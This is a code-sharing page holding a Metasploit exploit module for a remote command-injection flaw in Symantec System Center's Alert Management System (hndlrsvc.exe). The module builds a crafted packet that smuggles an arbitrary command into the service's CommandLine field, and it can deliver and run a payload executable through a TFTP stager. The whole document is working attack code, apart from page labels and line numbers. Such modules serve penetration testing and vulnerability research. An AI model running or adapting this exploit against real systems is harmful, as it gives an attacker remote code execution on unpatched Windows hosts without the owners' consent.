扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 |
## # $Id: ams_hndlrsvc.rb 13591 2011-08-19 18:35:29Z mc $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution', 'Description'=> %q{ Symantec System Center Alert Management System is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input. }, 'Author' => [ 'MC' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 13591 $', 'References' => [ [ 'OSVDB', '66807'], [ 'BID', '41959' ], [ 'URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt' ], ], 'Targets' => [ [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ] ], 'Privileged' => 'true', 'Platform' => 'win', 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 26 2010')) register_options( [ Opt::RPORT(38292), OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]), ], self.class) end def windows_stager exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe" print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") execute_cmdstager({ :temp => '.'}) @payload_exe = payload_exe print_status("Attempting to execute the payload...") execute_command(@payload_exe) end def execute_command(cmd, opts = {}) connect if ( cmd.length > 128 ) raise RuntimeError,"Command strings greater then 128 characters will not be processed!" end string_uno= Rex::Text.rand_text_alpha_upper(11) string_dos= Rex::Text.rand_text_alpha_upper(rand(4) + 5) packet ="\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00" packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00" packet << "\xe8\x03\x00\x00" packet << 'PRGXCNFG' packet << "\x10\x00\x00\x00" packet << "\x00\x00\x00\x00\x04" packet << 'ALHD\F' packet << "\x00\x00\x01\x00\x00" packet << "\x00\x01\x00\x0e\x00" packet << 'Risk Repaired' packet << "\x00\x25\x00" packet << 'Symantec Antivirus Corporate Edition' packet << "\x00\xf9\x1d\x13\x4a\x3f" packet << [string_uno.length + 1].pack('v') + string_uno packet << "\x00\x08\x08\x0a" packet << "\x00" + 'Risk Name' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00\x08\x0a\x00" packet << 'File Path' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00\x08\x11\x00" packet << 'Requested Action' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00\x08\x0e\x00" packet << 'Actual Action' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00\x08\x07\x00" packet << 'Logger' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00\x08\x05\x00" packet << 'User' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00\x08\x09\x00" packet << 'Hostname' packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno packet << "\x00\x08\x13\x00" packet << 'Corrective Actions' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00\x00\x07\x08\x12\x00" packet << 'ConfigurationName' packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n') packet << "\x00" + cmd packet << "\x00\x08\x0c\x00" packet << 'CommandLine' packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n') packet << "\x00" + cmd packet << "\x00\x08\x08\x00" packet << 'RunArgs' packet << "\x00\x04\x00\x02\x00" packet << "\x20\x00\x03\x05\x00" packet << 'Mode' packet << "\x00\x04\x00\x02\x00\x00\x00" packet << "\x0a\x0d\x00" packet << 'FormatString' packet << "\x00\x02\x00\x00\x00\x08\x12\x00" packet << 'ConfigurationName' packet << "\x00\x02\x00\x00\x00\x08\x0c\x00" packet << 'HandlerHost' packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') packet << "\x00" + string_dos packet << "\x00" * packet.length sock.put(packet) select(nil,nil,nil,3) disconnect end def exploit if not datastore['CMD'].empty? print_status("Executing command '#{datastore['CMD']}'") execute_command(datastore['CMD']) return end case target['Platform'] when 'win' windows_stager else raise RuntimeError, 'Target not supported.' end handler end end |
体验盒子
